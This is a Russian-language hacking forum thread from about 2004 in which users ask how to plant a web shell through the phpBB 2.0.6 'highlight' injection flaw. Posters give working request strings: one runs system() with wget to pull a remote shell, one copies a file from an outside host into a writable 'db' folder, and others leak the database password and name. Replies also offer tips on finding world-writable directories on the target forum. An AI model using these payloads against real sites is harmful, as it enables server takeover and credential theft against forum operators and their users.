Форумы Вопрос по заливке шелла, используя уязвимость highlight в форуме phpBB 2.0.6

Discussion in 'Уязвимости CMS/форумов' started by vega2k, 27 Dec 2004.

  1. vega2k

    vega2k New Member

    Joined:
    26 Dec 2004
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    какая команда на запись в другую папку.(отличную от корневой напр. "forum)"


    расcказываю как есть...
    на одном форуме есть папка доступная к записыванию эта папка называется db

    ВОПРОС:
    как залить туда шелл, использую эту уязвимость


    - как я понимаю эта команда для записи в корневую папку.

    форум phpBB 2.0.6

    Уважаемые, только не молчите.
     
  2. illusion

    illusion Banned

    Joined:
    7 Dec 2004
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    Для начала зделай cd <путь>, а вот потом уж заливай!
    Что-то типа:
    viewtopic.php?xxx=cd <путь>;wget <адрес твоего ремоута>&t=1&highlight=%2527.system($_GET[xxx]).include%2527
     
  3. vega2k

    vega2k New Member

    Joined:
    26 Dec 2004
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    нет, illusion
    что-то не подходит, мне кажется ты не втом порядке записал.
     
  4. vega2k

    vega2k New Member

    Joined:
    26 Dec 2004
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    хм...так что же это получается, если сам форум не разрешен на запись, значит и не в какую другую папку и не записпть, если она доступна для записи ?
     
  5. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,369
    Likes Received:
    872
    Reputations:
    20
    нет не так.. ищи папку в которую запись разрешена.. или хотя бы файл в который можно писать...
     
  6. vega2k

    vega2k New Member

    Joined:
    26 Dec 2004
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    admin drwxr-xr-x
    cache drwxr-xr-x
    db drwxrwxrwx
    docs drwxr-xr-x
    images drwxr-xr-x
    includes drwxr-xr-x
    language drwxr-xr-x
    templates drwxr-xr-x
    common.php -rw-r--r--
    config.php -rwxrwxrwx

    пишу,

    viewtopic.php?a=http://www.hot.ee/vega2k/1.hp&b=&b=/db/dhelp.php&t=44&highlight=%2527%252ecopy($_GET[a],$_GET)%252e%2527

    и ни чего не выходит, не записывается.

    а вот на другом форуме, где есть доступ на запись в саму папку форума, я могу и вдругие папки записывать, которые находяться не в папке форума а чуть выше (по дереву)
     
    #6 vega2k, 28 Dec 2004
    Last edited: 28 Dec 2004
  7. onyx3

    onyx3 New Member

    Joined:
    21 Dec 2004
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    А какой командой можно посмтатреть какие папки открыты на запись???
     
  8. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,369
    Likes Received:
    872
    Reputations:
    20
    vega2k так может та команда что ты пишешь не работает просто на сервере?
     
  9. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    868
    Likes Received:
    343
    Reputations:
    423
    2onyx3 Вот этой ls -l
     
    _________________________
  10. vega2k

    vega2k New Member

    Joined:
    26 Dec 2004
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Егорыч+++, хех, возможно...
     
  11. Shtirlic

    Shtirlic New Member

    Joined:
    13 Dec 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    &highlight=%2527.$poster=$dbpasswd.%2527 -пасс от базы
    &highlight=%2527.$poster=$dbname.%2527-имя базы
     
  12. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,675
    Likes Received:
    1,028
    Reputations:
    1,228
    29.12.2004, 16:30
    Shtirlic, поднимать старые темы стало модным?
     
    _________________________
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,420
    Likes Received:
    814
    Reputations:
    851
    а как залить шелл если на сервере нет wget'a?
     
    _________________________
Loading...